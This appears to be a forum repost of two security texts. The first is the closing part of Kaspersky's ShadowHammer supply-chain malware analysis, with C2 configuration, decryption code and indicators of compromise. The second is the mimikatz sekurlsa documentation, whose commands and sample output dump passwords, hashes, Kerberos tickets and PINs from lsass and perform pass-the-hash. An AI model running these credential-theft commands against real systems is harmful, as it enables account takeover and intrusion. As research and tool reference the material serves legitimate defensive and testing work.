Year). This helped us to confirm that the attack was in a deactivated stage and there was no immediate risk to new infections and gave us more time to collect further artefacts. However, all compromised ASUS binaries had to be properly flagged as containing malware and removed from Kaspersky Lab users’ computers. Non-ASUS-related cases In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia. One of these vendors is a game development company from Thailand known as Electronics Extreme Company Limited. The company has released digitally signed binaries of a video game called “Infestation: Survivor Stories”. It is a zombie survival game in which players endure the hardships of a post-apocalyptic, zombie-infested world. According to Wikipedia, “the game was panned by critics and is considered one of the worst video games of all time“. The game servers were taken offline on December 15, 2016.” The history of this videogame itself contains many controversies. According to Wikipedia, it was originally developed under the title of “The War Z” and released by OP Productions which put it in the Steam store in December 2012. In April 4, 2013, the game servers were compromised, and the game source code was most probably stolen and released to the public. It seems that certain videogame companies picked up this available code and started making their own versions of the game. One such version (md5: de721e2f055f1b203ab561dda4377bab) was digitally signed by Innovative Extremist Co. LTD., a company from Thailand that currently provides web & IT infrastructure services. The game also contains a logo of Electronics Extreme Company Limited with a link to their website. The homepage of Innovative Extremist also listed Electronics Extreme as one of their partners. Notably, the certificate from Innovative Extremist that was used to sign Infestation is currently revoked. However, the story does not end here. It seems that Electronics Extreme picked up the video game where Innovative Extremist dropped it. And now the game seems to be causing trouble again. We found at least three samples of Infestation signed by Electronics Extreme with a certificate that must be revoked again. We believe that a poorly maintained development environment, leaked source code, as well vulnerable production servers were at the core of the bad luck chasing this videogame. Ironically, this game about infestation brought only trouble and a serious infection to its developers. Several executable files from the popular FPS videogame PointBlank contained a similar malware injection. The game was developed by the South Korean company Zepetto Co, whose digital signature was also abused. Although the certificate was still unrevoked as at early April, Zepetto seems to have stopped using the certificate at the end of February 2019. While some details about this case were announced in March 2019 by our colleagues at ESET, we have been working on this in parallel with ESET and uncovered some additional facts. All these cases involve digitally signed binaries from three vendors based in three different Asian countries. They are signed with different certificates and a unique chain of trust. What is common to these cases is the way the binaries were trojanized. The code injection happened through modification of commonly used functions such as CRT (C runtime), which is similar to ASUS case. However, the implementation is very different in the case of the videogame companies. In the ASUS case, the attackers only tampered with a compiled ASUS binary from 2015 and injected additional code. In the other cases, the binaries were recent (from the end of 2018). The malicious code was not inserted as a resource, neither did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases, it starts at the beginning of the code section as if it had been added even before the legitimate code. Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victim’s projects or injected malware on the premises of the breached companies at the time of project compilation. Payload from non-ASUS-related cases The payload included into the compromised videogames is rather simple. First of all, it checks whether the process has administrative privileges. Next, it checks the registry value at HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819}. If the value exists and is non-zero, the payload does not run further. Otherwise, it starts a new thread with a malicious intent. The file contains a hardcoded miniconfig—an annotated example of the config is provided below. C2 URL: https://nw.infestexe[.]com/version/last.php Sleep time: 240000 Target Tag: warz Unwanted processes: wireshark.exe;perfmon.exe;procmon64.exe;procmon.exe;procexp.exe;procexp64.exe;netmon.exe Apparently, the backdoor was specifically created for this target, which is confirmed by an internal tag (the previous name of the game is “The War Z”). If any of the unwanted processes is running, or the system language ID is Simplified Chinese or Russian, the malware does not proceed. It also checks for the presence of a mutex named Windows-{0753-6681-BD59-8819}, which is also a sign to stop execution. After all checks are done, the malware gathers information about the system including: Network adapter MAC address System username System hostname and IP address Windows version CPU architecture Current host FQDN Domain name Current executable file name Drive 😄 volume name and serial number Screen resolution System default language ID This information is concatenated in one string using the following string template: “%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s”. Then the malware crafts a host identifier, which is made up of the C drive serial number string XOR-ed with the hardcoded string “*&b0i0rong2Y7un1” and encoded with the Base64 algorithm. Later on, the 😄 serial number may be used by the attackers to craft unique backdoor code that runs only on a system with identical properties. The malware uses HTTP for communication with a C2 server and crafts HTTP headers on its own. It uses the following hardcoded User-Agent string: “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36” Interestingly, when the malware identifies the Windows version, it uses a long list: Microsoft Windows NT 4.0 Microsoft Windows 95 Microsoft Windows 98 Microsoft Windows Me Microsoft Windows 2000e Microsoft Windows XP Microsoft Windows XP Professional x64 Edition Microsoft Windows Server 2003 Microsoft Windows Server 2003 R2 Microsoft Windows Vista Microsoft Windows Server 2008 Microsoft Windows 7 Microsoft Windows Server 2008 R2 Microsoft Windows 8 Microsoft Windows Server 2012 Microsoft Windows 8.1 Microsoft Windows Server 2012 R2 Microsoft Windows 10 Microsoft Windows Server 2016 The purpose of the code is to submit system information to the C2 server with a POST request and then send another GET request to receive a command to execute. The following commands were discovered: DownUrlFile – download URL data to file DownRunUrlFile – download URL data to file and execute it RunUrlBinInMem – download URL data and run as shellcode UnInstall – set registry flag to prevent malware start The UnInstall command sets the registry value HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819} to 1, which prevents the malware from contacting the C2 again. No files are deleted from the disk, and the files should be discoverable through forensic analysis. Similarities between the ASUS attack and the non-ASUS-related cases Although the ASUS case and the videogame industry cases contain certain differences, they are very similar. Let us briefly mention some of the similarities. For instance, the algorithm used to calculate API function hashes (in trojanized games) resembles the one used in the backdoored ASUS Updater tool. hash = 0 for c in string: hash = hash * 0x21 hash = hash + c return hash 1 2 3 4 5 hash = 0 for c in string: hash = hash * 0x21 hash = hash + c return hash hash = 0 for c in string: hash = hash * 0x83 hash = hash + c return hash & 0x7FFFFFFF 1 2 3 4 5 hash = 0 for c in string: hash = hash * 0x83 hash = hash + c return hash & 0x7FFFFFFF ASUS case Other cases Pseudocode of API hashing algorithm of ASUS vs. other cases Besides that, our behavior engine identified that ASUS and other related samples are some of the only cases where the IPHLPAPI.dll was used from within a shellcode embedded into a PE file. In the case of ASUS, the function GetAdaptersAddresses from the IPHLPAPI.dll was used for calculating the hashes of MAC addresses. In the other cases, the function GetAdaptersInfo from the IPHLPAPI.dll was used to retrieve information about the MAC addresses of the computer to pass to remote C&C servers. ShadowPad connection While investigating this case, we worked with several companies that had been abused in this wave of supply chain attacks. Our joint investigation revealed that the attackers deployed several tools on an attacked network, including a trojanized linker and a powerful backdoor packed with a recent version of VMProtect. Our analysis of the sophisticated backdoor (md5: 37e100dd8b2ad8b301b130c2bca3f1ea) that was deployed by the attackers on the company’s internal network during the breach, revealed that it was an updated version of the ShadowPad backdoor, which we reported on in 2017. The ShadowPad backdoor used in these cases has a very high level of complexity, which makes it almost impossible to reverse engineer: The newly updated version of ShadowPad follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. As with ShadowPad, the attackers used at least two stages of C2 servers, where the first stage would provide the backdoor with an encrypted next-stage C2 domain. The backdoor contains a hardcoded URL for C2 communication, which points to a publicly editable online Google document. Such online documents, which we extracted from several backdoors, were created by the same user under a name of Tom Giardino (hrsimon59@gmail[.]com), probably a reference to the spokesperson from Valve Corporation. These online documents contained an ASCII block of text marked as an RSA private key during the time of operation. We noticed that inside the private key, normally encoded with base64, there was an invalid character injection (the symbol “$”): The message between the two “$” characters in fact contained an encrypted second-stage C2 URL. We managed to extract the history of changes and collected the following information indicating the time and C2 of ongoing operations in 2018: Jul 31: UDP://103.19.3[.]17:443 Aug 13: UDP://103.19.3[.]17:443 Oct 08: UDP://103.19.3[.]17:443 Oct 09: UDP://103.19.3[.]17:443 Oct 22: UDP://117.16.142[.]9:443 Nov 20: HTTPS://23.236.77[.]177:443 Nov 21: UDP://117.16.142[.]9:443 Nov 22: UDP://117.16.142[.]9:443 Nov 23: UDP://117.16.142[.]9:443 Nov 27: UDP://117.16.142[.]9:443 Nov 27: HTTPS://103.19.3[.]44:443 Nov 27: TCP://103.19.3[.]44:443 Nov 27: UDP://103.19.3[.]44:1194 Nov 27: HTTPS://23.236.77[.]175:443 Nov 29: HTTPS://23.236.77[.]175:443 Nov 29: UDP://103.19.3[.]43:443 Nov 30: HTTPS://23.236.77[.]177:443 The IP address range 23.236.64.0-23.236.79.255 belongs to the Chinese hosting company Aoyouhost LLC, incorporated in Los Angeles, CA. Another IP address (117.16.142[.]9) belongs to a range listed as the Korean Education Network and likely belongs to Konkuk university (konkuk.ac.kr). This IP address range has been previously reported by Avast as one of those related to the ShadowPad activity linked to the CCleaner incident. It seems that the ShadowPad attackers are still abusing the university’s network to host their C2 infrastructure. The last one, 103.19.3[.]44, is located in Japan but seems to belong to another Chinese ISP known as “xTom Shanghai Limited”. Connected to via the IP address, the server displays an error page from Chinese web management software called BaoTa (“宝塔” in Chinese): PlugX connection While analyzing the malicious payload injected into the signed ASUS Live Updater binaries, we came across a simple custom encryption algorithm used in the malware. We found that ShadowHammer reused algorithms used in multiple malware samples, including many of PlugX. PlugX is a backdoor quite popular among Chinese-speaking hacker groups. It had previously been seen in the Codoso, MenuPass and Hikit attacks. Some of the samples we found (i.e. md5:5d40e86b09e6fe1dedbc87457a086d95) were created as early as 2012 if the compilation timestamp is anything to trust. Apparently, both pieces of code share the same constants (0x11111111, 0x22222222, 0x33333333, 0x44444444), but also implement identical algorithms to decrypt data, summarized in the python function below. from ctypes import c_uint32 from struct import pack,unpack def decrypt(data): p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]; pos = 0 decdata = "" while pos < len(data): p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value decdata += chr( ( ord(data[pos]) ^ ( ( p1%256 + p2%256 + p3%256 + p4%256 ) % 256 ) ) ) pos += 1 return decdata 1 2 3 4 5 6 7 8 9 10 11 12 13 from ctypes import c_uint32 from struct import pack,unpack def decrypt(data): p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]; pos = 0 decdata = "" while pos < len(data): p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value decdata += chr( ( ord(data[pos]) ^ ( ( p1%256 + p2%256 + p3%256 + p4%256 ) % 256 ) ) ) pos += 1 return decdata <//pre> While this does not indicate a strong connection to PlugX creators, the reuse of the algorithm is unusual and may suggest that the ShadowHammer developers had some experience with PlugX source code, and possibly compiled and used PlugX in some other attacks in the past. Compromising software developers All of the analyzed ASUS Live Updater binaries were backdoored using the same executable file patched by an external malicious application, which implemented malware injection on demand. After that, the attackers signed the executable and delivered it to the victims via ASUS update servers, which was detected by Kaspersky Lab products. However, in the non-ASUS cases, the malware was seamlessly integrated into the code of recently compiled legitimate applications, which suggests that a different technique was used. Our deep search revealed another malware injection mechanism, which comes from a trojanized development environment used by software coders in the organization. In late 2018, we found a suspicious sample of the link.exe tool uploaded to a public malware scanning service. The tool is part of Microsoft Visual Studio, a popular integrated development environment (IDE) used for creating applications for Microsoft Windows. The same user also uploaded digitally signed compromised executables and some of the backdoors used in the same campaign. The attack is comprised of an infected Microsoft Incremental Linker, a malicious DLL module that gets loaded through the compromised linker. The malicious DLL then hooks the file open operation and redirects attempts to open a commonly used C++ runtime library during the process of static linking. The redirect destination is a malicious .lib file, which gets linked with the target software instead of the legitimate library. The code also carefully checks which executable is being linked and applies file redirection only if the name matches the hardcoded target file name. So, was it a developer from a videogame company that installed the trojanized version of the development software, or did the attackers deploy the Trojan code after compromising the developer’s machine? This currently remains unknown. While we could not identify how the attackers managed to replace key files in the integrated development environment, this should serve as a wakeup call to all software developers. If your company produces software, you should ask yourself: Where does my development software come from? Is the delivery process (download) of IDE distributions secure? When did we last check the integrity of our development software? Other victims During the analysis of samples related to the updated ShadowPad arsenal, we discovered one unusual backdoor executable (md5: 092ae9ce61f6575344c424967bd79437). It comes as a DLL installed as a service that indirectly listens to TCP port 80 on the target system and responds to a specific URL schema, registered with Windows HTTP Service API: http://+/requested.html. The malware responds to HTTP GET/POST requests using this schema and is not easy to discover, which can help it remain invisible for a long time. Based on the malware network behavior, we identified three further, previously unknown, victims, a videogame company, a conglomerate holding company and a pharmaceutical company, all based in South Korea, which responded with a confirmation to the malware protocol, indicating compromised servers. We are in the process of notifying the victim companies via our local regional channels. Considering that this type of malware is not widely used and is a custom one, we believe that the same threat actor or a related group are behind these further compromises. This expands the list of previously known usual targets. Conclusions While attacks on supply chain companies are not new, the current incident is a big landmark in the cyberattack landscape. Not only does it show that even reputable vendors may suffer from compromising of digital certificates, but it raises many concerns about the software development infrastructure of all other software companies. ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker. How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism. Does it mean that we should stop trusting digital signatures? No. But we definitely need to investigate all strange or anomalous behavior, even by trusted and signed applications. Software vendors should introduce another line in their software building conveyor that additionally checks their software for potential malware injections even after the code is digitally signed. At this unprecedented scale of operations, it is still a mystery why attackers reduced the impact by limiting payload execution to 600+ victims in the case of ASUS. We are also unsure who the ultimate victims were or where the attackers had collected the victims MAC addresses from. If you believe you are one of the victims, we recommend checking your MAC address using this free tool or online check website. And if you discover that you have been targeted by this operation, please email us at shadowhammer@kaspersky.com. We will keep tracking the ShadowPad activities and inform you about new findings! Indicators of compromise C2 servers: 103.19.3[.]17 103.19.3[.]43 103.19.3[.]44 117.16.142[.]9 23.236.77[.]175 23.236.77[.]177 Malware samples and trojanized files: 02385ea5f8463a2845bfe362c6c659fa 915086d90596eb5903bcd5b02fd97e3e 04fb0ccf3ef309b1cd587f609ab0e81e 943db472b4fd0c43428bfc6542d11913 05eacf843b716294ea759823d8f4ab23 95b6adbcef914a4df092f4294473252f 063ff7cc1778e7073eacb5083738e6a2 98908ce6f80ecc48628c8d2bf5b2a50c 06c19cd73471f0db027ab9eb85edc607 9d86dff1a6b70bfdf44406417d3e068f 0e1cc8693478d84e0c5e9edb2dc8555c a17cb9df43b31bd3dad620559d434e53 0f49621b06f2cdaac8850c6e9581a594 a283d5dea22e061c4ab721959e8f4a24 128cecc59c91c0d0574bc1075fe7cb40 a4b42c2c95d1f2ff12171a01c86cd64f 17a36ac3e31f3a18936552aff2c80249 a76a1fbfd45ad562e815668972267c70 1a0752f14f89891655d746c07da4de01 a96226b8c5599e3391c7b111860dd654 1b95ac1443eb486924ac4d399371397c a9c750b7a3bbf975e69ef78850af0163 1d05380f3425d54e4ddfc4bacc21d90e aa15eb28292321b586c27d8401703494 1e091d725b72aed432a03a505b8d617e aac57bac5f849585ba265a6cd35fde67 2ffc4f0e240ff62a8703e87030a96e39 aafe680feae55bb6226ece175282f068 322cb39bc049aa69136925137906d855 abbb53e1b60ab7044dd379cf80042660 343ad9d459f4154d0d2de577519fb2d3 abbd7c949985748c353da68de9448538 36dd195269979e01a29e37c488928497 b042bc851cafd77e471fa0d90a082043 3c0a0e95ccedaaafb4b3f6fd514fd087 b044cd0f6aae371acf2e349ef78ab39e 496c224d10e1b39a22967a331f7de0a2 b257f366a9f5a065130d4dc99152ee10 4b8d5ae0ad5750233dc1589828da130b b4abe604916c04fe3dd8b9cb3d501d3f 4fb4c6da73a0a380c6797e9640d7fa00 b572925a7286355ac9ebb12a9fc0cc79 5220c683de5b01a70487dac2440e0ecb b96bd0bda90d3f28d3aa5a40816695ed 53886c6ebd47a251f11b44869f67163d c0116d877d048b1ba87c0de6fd7c3fb2 55a7aa5f0e52ba4d78c145811c830107 c778fc8e816061420c537db2617e0297 5855ce7c4a3167f0e006310eb1c76313 cdb0a09067877f30189811c7aea3f253 5b6cd0a85996a7d47a8e9f8011d4ad3f d07e6abebcf1f2119622c60ad0acf4fa 5eed18254d797ccea62d5b74d96b6795 d1ed421779c31df2a059fe0f91c24721 6186b317c8b6a9da3ca4c166e68883ea d4c4813b21556dd478315734e1c7ae54 63606c861a63a8c60edcd80923b18f96 dc15e578401ad9b8f72c4d60b79fdf0f 63f2fe96de336b6097806b22b5ab941a dca86d2a9eb6dc53f549860f103486a9 6ab5386b5ad294fc6ec4d5e47c9c2470 dd792f9185860e1464b4346254b2101b 6b38c772b2ffd7a7818780b29f51ccb2 e7dcfa8e75b0437975ce0b2cb123dc7b 6cf305a34a71b40c60722b2b47689220 e8db4206c2c12df7f61118173be22c89 6e94b8882fe5865df8c4d62d6cff5620 ea3b7770018a20fc7c4541c39ea271af 7d9d29c1c03461608bcab930fef2f568 eac3e3ece94bc84e922ec077efb15edd 807d86da63f0db1fc746d1f0b05bc357 ecf865c95a9bec46aa9b97060c0e317d 849a2b0dc80aeca3d175c139efe5221c ef43b55353a34be9e93160bb1768b1a6 8505484efde6a1009f90fa02ca42f011 f0ba34be0486037913e005605301f3ce 8578f0c7b0a14f129cc66ee236c58050 f2f879989d967e03b9ea0938399464ab 86a4cac227078b9c95c560c8f0370bf0 f4edc757e9917243ce513f22d0ccacf2 8756bafa7f0a9764311d52bc792009f9 f9d46bbffa1cbd106ab838ee0ccc5242 87a8930e88e9564a30288572b54faa46 fa83ffde24f149f9f6d1d8bc05c0e023 88777aacd5f16599547926a4c9202862 fa96e56e7c26515875214eec743d2db5 8baa46d0e0faa2c6a3f20aeda2556b18 fb1473e5423c8b82eb0e1a40a8baa118 8ef2d715f3a0a3d3ebc989b191682017 fcfab508663d9ce519b51f767e902806 092ae9ce61f6575344c424967bd79437 7f05d410dc0d1b0e7a3fcc6cdda7a2ff eb37c75369046fb1076450b3c34fb8ab Sursa: https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/
-
module ~ sekurlsa Benjamin DELPY edited this page a day ago · 43 revisions This module extracts passwords, keys, pin codes, tickets from the memory of lsass (Local Security Authority Subsystem Service) the process by default, or a minidump of it! (see: howto ~ get passwords by memory dump for minidump or other dumps instructions) When working with lsass process, mimikatz needs some rights, choice: Administrator, to get debug privilege via privilege::debug SYSTEM account, via post exploitation tools, scheduled tasks, psexec -s ... - in this case debug privilege is not needed. Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump). So, do not hesitate to start with: mimikatz # privilege::debug Privilege '20' OK mimikatz # log sekurlsa.log Using 'sekurlsa.log' for logfile : OK ...before others commands The information that can be extracted depends on the version of Windows and authentication methods: [en] http://1drv.ms/1fCWkhu Starting with Windows 8.x and 10, by default, there is no password in memory. Exceptions: When DC is/are unreachable, the kerberos provider keeps passwords for future negocation ; When HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, UseLogonCredential (DWORD) is set to 1, the wdigest provider keeps passwords ; When values in Allow* in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults or HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation, the tspkgs / CredSSP provider keeps passwords. Of course, not when using Credential Guard. Commands: logonpasswords, pth, tickets, ekeys, dpapi, minidump, process, searchpasswords, msv, wdigest, kerberos, tspkg, livessp, ssp, credman logonpasswords mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 88038 (00000000:000157e6) Session : Interactive from 1 User Name : Gentil Kiwi Domain : vm-w7-ult SID : S-1-5-21-2044528444-627255920-3055224092-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult * Password : waza1234/ wdigest : * Username : Gentil Kiwi * Domain : vm-w7-ult * Password : waza1234/ kerberos : * Username : Gentil Kiwi * Domain : vm-w7-ult * Password : waza1234/ ssp : [00000000] * Username : admin * Domain : nas * Password : anotherpassword credman : [00000000] * Username : nas\admin * Domain : nas.chocolate.local * Password : anotherpassword pth Pass-The-Hash mimikatz can perform the well-known operation 'Pass-The-Hash' to run a process under another credentials with NTLM hash of the user's password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password). Arguments: /user - the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account. /domain - the fully qualified domain name - without domain or in case of local user/admin, use computer or server name, workgroup or whatever. /rc4 or /ntlm - optional - the RC4 key / NTLM hash of the user's password. /aes128 - optional - the AES128 key derived from the user's password and the realm of the domain. /aes256 - optional - the AES256 key derived from the user's password and the realm of the domain. /run - optional - the command line to run - default is: cmd to have a shell. mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a user : Administrateur domain : chocolate.local program : cmd.exe NTLM : cc36cf7a8514893efccd332446158b1a | PID 712 | TID 300 | LUID 0 ; 362544 (00000000:00058830) \_ msv1_0 - data copy @ 000F8AF4 : OK ! \_ kerberos - data copy @ 000E23B8 \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ des_cbc_md5 -> null \_ des_cbc_crc -> null \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace -> null Also valid on Windows recent versions: sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 Remarks: this command does not work with minidumps (nonsense); it requires elevated privileges (privilege::debug or SYSTEM account), unlike 'Pass-The-Ticket' which uses one official API ; this new version of 'Pass-The-Hash' replaces RC4 keys of Kerberos by the ntlm hash (and/or replaces AES keys) - it permits to the Kerberos provider to ask TGT tickets! ; ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ; AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash. See also: Pass-The-Ticket: kerberos::ptt Golden Ticket: kerberos::golden tickets List and export Kerberos tickets of all sessions. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users). Argument: /export - optional - tickets are exported in .kirbi files. They start with user's LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT) mimikatz # sekurlsa::tickets /export Authentication Id : 0 ; 541043 (00000000:00084173) Session : Interactive from 2 User Name : Administrateur Domain : CHOCOLATE SID : S-1-5-21-130452501-2365100805-3685010670-500 * Username : Administrateur * Domain : CHOCOLATE.LOCAL * Password : (null) Group 0 - Ticket Granting Service [00000000] Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58 Service Name (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL Target Name (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac d0195b657e63cdec73f32bf44d36bb12a62c928de6db9964b5a87c55721f8d04 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;84173]-0-0-40a50000-Administrateur@ldap-srvcharly.chocolate.local.kirbi ! [00000001] Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58 Service Name (02) : LDAP ; srvcharly.chocolate.local ; chocolate.local ; @ CHOCOLATE.LOCAL Target Name (02) : LDAP ; srvcharly.chocolate.local ; chocolate.local ; @ CHOCOLATE.LOCAL Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL ) Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 60cedabb5c3e2874131e9770c2d858fdec0342acf8c8787771d7c4475ace0392 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;84173]-0-1-40a50000-Administrateur@LDAP-srvcharly.chocolate.local.kirbi ! Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket [00000000] Start/End/MaxRenew: 11/05/2014 16:47:58 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58 Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL Target Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 4b42cce01deffbfb0e67efc18c993bb52601848763aecf322030329cd1882e4c Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;84173]-2-0-40e10000-Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi ! See also: Pass-The-Ticket: kerberos::ptt Golden Ticket: kerberos::golden ekeys mimikatz # sekurlsa::ekeys Authentication Id : 0 ; 541043 (00000000:00084173) Session : Interactive from 2 User Name : Administrateur Domain : CHOCOLATE SID : S-1-5-21-130452501-2365100805-3685010670-500 * Username : Administrateur * Domain : CHOCOLATE.LOCAL * Password : (null) * Key List : aes256_hmac b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 rc4_hmac_nt cc36cf7a8514893efccd332446158b1a rc4_hmac_old cc36cf7a8514893efccd332446158b1a rc4_md4 cc36cf7a8514893efccd332446158b1a rc4_hmac_nt_exp cc36cf7a8514893efccd332446158b1a rc4_hmac_old_exp cc36cf7a8514893efccd332446158b1a dpapi mimikatz # sekurlsa::dpapi Authentication Id : 0 ; 251812 (00000000:0003d7a4) Session : Interactive from 1 User Name : Administrateur Domain : CHOCOLATE SID : S-1-5-21-130452501-2365100805-3685010670-500 [00000000] * GUID : {62f69fd3-0a99-4531-bf94-7442fdf1e411} * Time : 01/05/2014 13:12:39 * Key : 8801bde168af739ab81aa32b79aa0ee4c27cb9c0dc94b6ab0a8516e650b4bdd565110ae1040d3e47add422454d92b307276bebdba7b23b2b2f8005066ede3580 minidump mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP : 'lsass.dmp' mimikatz # sekurlsa::logonpasswords Opening : 'lsass.dmp' file for minidump... Authentication Id : 0 ; 88038 (00000000:000157e6) Session : Interactive from 1 User Name : Gentil Kiwi Domain : vm-w7-ult SID : S-1-5-21-2044528444-627255920-3055224092-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 ... Remark: Dump from Works on NT 5 - x86 NT 5 - x86 NT 5 - x64 NT 5 - x64 NT 6 - x86 NT 6 - x86/x64 (mimikatz x86) NT 6 - x64 NT 6 - x64 Some errors: ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B) You try to open minidump from a Windows NT of another major version (NT5 vs NT6). ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B) You try to open minidump from a Windows NT of another architecture (x86 vs x64). ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002) The minidump file is not found (check path). process searchpasswords msv Authentication Id : 0 ; 3518063 (00000000:0035ae6f) Session : Unlock from 1 User Name : Administrateur Domain : CHOCOLATE SID : S-1-5-21-130452501-2365100805-3685010670-500 msv : [00010000] CredentialKeys * RootKey : 2a099891174e2d700d44368255a53a1a0e360471343c1ad580d57989bba09a14 * DPAPI : 43d7b788389b67ee3bcac1786f01a75f Authentication Id : 0 ; 3463053 (00000000:0034d78d) Session : Interactive from 2 User Name : utilisateur Domain : CHOCOLATE SID : S-1-5-21-130452501-2365100805-3685010670-1107 msv : [00010000] CredentialKeys * NTLM : 8e3a18d453ec2450c321003772d678d5 * SHA1 : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa [00000003] Primary * Username : utilisateur * Domain : CHOCOLATE * LM : 00000000000000000000000000000000 * NTLM : 8e3a18d453ec2450c321003772d678d5 * SHA1 : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa wdigest kerberos When using smartcard logon on the domain, lsass caches PIN code of the smartcard mimikatz # sekurlsa::kerberos [...] kerberos : * Username : Administrateur * Domain : CHOCOLATE.LOCAL * Password : (null) * PIN code : 1234 tspkg livessp ssp credman Sursa: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa
-
